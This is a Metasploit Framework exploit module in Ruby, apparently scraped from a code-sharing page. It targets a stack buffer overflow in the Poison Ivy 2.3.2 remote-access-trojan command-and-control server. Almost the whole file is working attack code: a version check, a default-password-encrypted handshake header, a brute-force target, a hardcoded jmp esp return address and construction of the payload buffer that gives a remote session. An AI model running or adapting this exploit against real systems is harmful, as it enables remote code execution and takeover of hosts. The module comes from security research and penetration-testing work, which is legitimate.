扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 |
## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Brute def initialize(info = {}) super(update_info(info, 'Name' => "Poison Ivy 2.3.2 C&C Server Buffer Overflow", 'Description'=> %q{ This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server. The exploit does not need to know the password chosen for the bot/server communication. If the C&C is configured with the default 'admin' password, the exploit should work fine. In case of the C&C configured with another password the exploit can fail. The 'check' command can be used to determine if the C&C target is using the default 'admin' password. Hopefully an exploit try won't crash the Poison Ivy C&C process, just the thread responsible of handling the connection. Because of this the module provides the RANDHEADER option and a bruteforce target. If RANDHEADER is used a random header will be used. If the bruteforce target is selected, a random header will be sent in case the default for the password 'admin' doesn't work. Bruteforce will stop after 5 tries or a session obtained. }, 'License'=> MSF_LICENSE, 'Author' => [ 'Andrzej Dereszowski', # Vulnerability Discovery 'Gal Badishi', # Exploit and Metasploit module 'juan vazquez' # Testing and little of Metasploit-fu ], 'References' => [ [ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ], [ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ] ], 'DisclosureDate' => "Jun 24 2012", 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload'=> { 'StackAdjustment' => -4000, 'Space' => 10000, 'BadChars'=> "", }, 'Platform' => 'win', 'Targets'=> [ [ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1', { 'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe" 'RWAddress' => 0x00401000, 'Offset' => 0x806D, 'PayloadOffset' => 0x75, 'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp } ], [ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1', { 'Ret' => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe" 'RWAddress' => 0x00401000, 'Offset' => 0x806D, 'PayloadOffset' => 0x75, 'jmpPayload' => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp,0x8000 # jmp esp 'Bruteforce' => { 'Start' => { 'Try' => 1 }, 'Stop'=> { 'Try' => 6 }, 'Step'=> 1, 'Delay' => 2 } } ], ], 'DefaultTarget'=> 0 )) register_options( [ Opt::RPORT(3460), OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false]) ], self.class) register_advanced_options( [ OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]), ], self.class) end def check sig = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b" lensig = [0x000015D0].pack("V") connect sock.put("\x00" * 256) response = sock.read(256) datalen = sock.read(4) disconnect if datalen == lensig if response[0, 16] == sig print_status("Password appears to be \"admin\"") else print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.") end return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def single_exploit if datastore['RANDHEADER'] == true # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password header = rand_text(0x20) else # This is the 32-byte header we want to send, encrypted with the default password ("admin") # We have a very good chance of succeeding even if the password was changed header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7" end do_exploit(header) end def brute_exploit(brute_target) if brute_target['Try'] == 1 print_status("Bruteforcing - Try #{brute_target['Try']}: Header for 'admin' password") # This is the 32-byte header we want to send, encrypted with the default password ("admin") # We have a very good chance of succeeding even if the password was changed header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7" else print_status("Bruteforcing - Try #{brute_target['Try']}: Random Header") # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password header = rand_text(0x20) end do_exploit(header) end def do_exploit(header) # Handshake connect print_status("Performing handshake...") sock.put("\x00" * 256) sock.get # Don't change the nulls, or it might not work xploit= '' xploit << header xploit << "\x00" * (target['PayloadOffset'] - xploit.length) xploit << payload.encoded xploit << "\x00" * (target['Offset'] - xploit.length) xploit << [target.ret].pack("V") # ret to a jmp esp opcode xploit << [target['RWAddress']].pack("V") # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword) xploit << target['jmpPayload'] # This comes immediately after ret - it is a setup for the payload (jmp back) # The disconnection triggers the exploit print_status("Sending exploit...") sock.put(xploit) select(nil,nil,nil,5) disconnect end end =begin * ROP version of exploit(): Has been discarded at the moment because of two reasons: (1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process) (2) When trying a unpacked version on DEP enabled systems windows/exec payload runs, but not meterpreter =end |
体验盒子
